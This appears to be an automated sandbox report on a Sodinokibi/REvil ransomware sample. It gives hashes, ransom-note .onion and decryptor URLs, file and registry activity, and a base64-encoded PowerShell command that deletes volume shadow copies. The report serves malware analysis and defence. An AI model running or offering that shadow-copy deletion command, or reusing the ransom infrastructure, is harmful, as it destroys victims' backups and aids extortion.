Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
08-05-2024 23:56
Behavioral task
behavioral1
Sample
275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe
-
Size
168KB
-
MD5
275148bda4cdfce06afc24b35ff9dc21
-
SHA1
1a158b97cd5cbf70ac34ac53b88689451f16713c
-
SHA256
637b1a6dccd40e8ae16b78addd3f4f7a3d816210ea67a9f1c7d6efbfc58c66da
-
SHA512
ef6cd57d3c2a5e9b7c2e7b607b463c6b79e9287375cc228ce526ec53b04830795f58d6ba183964606c7033a8b93a2a6d56bf2806bf487b94b4fca84ff17c2c3d
-
SSDEEP
3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/NaXXQbU8IYz:lw02sJPi7O93NLbLIYz
Malware Config
Extracted
C:\Users\8y7b3gzaa-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/85D72FCA1995DD96
http://decryptor.top/85D72FCA1995DD96
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\K: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\O: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\T: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\Y: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\M: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\N: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\P: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\E: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\J: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\A: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\L: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\W: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\D: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\G: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\V: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\F: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\Q: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\X: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\H: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\S: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\Z: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\B: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\R: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened (read-only) \??\U: 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\i0um0.bmp" 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe -
Drops file in Program Files directory 36 IoCs
description ioc Process File opened for modification \??\c:\program files\RevokeSend.3g2 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\PingResume.css 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\RestoreFormat.jpeg 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\SearchUnpublish.i64 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\SuspendRemove.css 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\WaitUnpublish.wps 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\DisconnectEdit.jfif 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\ReceiveRestart.TS 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\PushWait.xps 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\RenameClose.xls 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\SyncUnpublish.rtf 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\8y7b3gzaa-readme.txt 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\AssertDebug.dotm 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\BackupProtect.xht 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\ProtectClose.au3 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\ReceiveUnlock.rmi 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\SwitchAssert.ppt 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File created \??\c:\program files (x86)\8y7b3gzaa-readme.txt 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\MeasureComplete.m4v 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\8y7b3gzaa-readme.txt 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\DisableRedo.mhtml 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\TestSplit.raw 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\EnterExit.php 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\8y7b3gzaa-readme.txt 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File created \??\c:\program files\8y7b3gzaa-readme.txt 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\AssertSave.jpeg 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\SkipOut.001 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\WritePop.gif 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\CopyShow.odp 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\DisconnectUnlock.gif 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\ProtectShow.mpeg2 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\PushSubmit.vb 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\ReadClear.vsd 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\SyncShow.vssm 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\DebugMerge.vdx 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe File opened for modification \??\c:\program files\MergeApprove.reg 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 836 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe 3052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3052 powershell.exe Token: SeBackupPrivilege 2644 vssvc.exe Token: SeRestorePrivilege 2644 vssvc.exe Token: SeAuditPrivilege 2644 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 836 wrote to memory of 3052 836 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe 28 PID 836 wrote to memory of 3052 836 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe 28 PID 836 wrote to memory of 3052 836 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe 28 PID 836 wrote to memory of 3052 836 275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe 28 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\275148bda4cdfce06afc24b35ff9dc21_JaffaCakes118.exe"1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2604
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD50d1fb12f296f649f6dd0cd007998b92d
SHA18ca6a6dfbdb848c0c6629c6f59346a57d3faf1e6
SHA25610bbab2a69098861f855e7a98cabfcdd5882aae1e5911c380b11bad7e87a8ac2
SHA512876b8643f974b8bef22e541bc4300129b7db169b13bbb3a684df42133d8694ffd468515b062beed5a897e75f753b78726aca956ab2821eae4d3bf85ca54c9ddf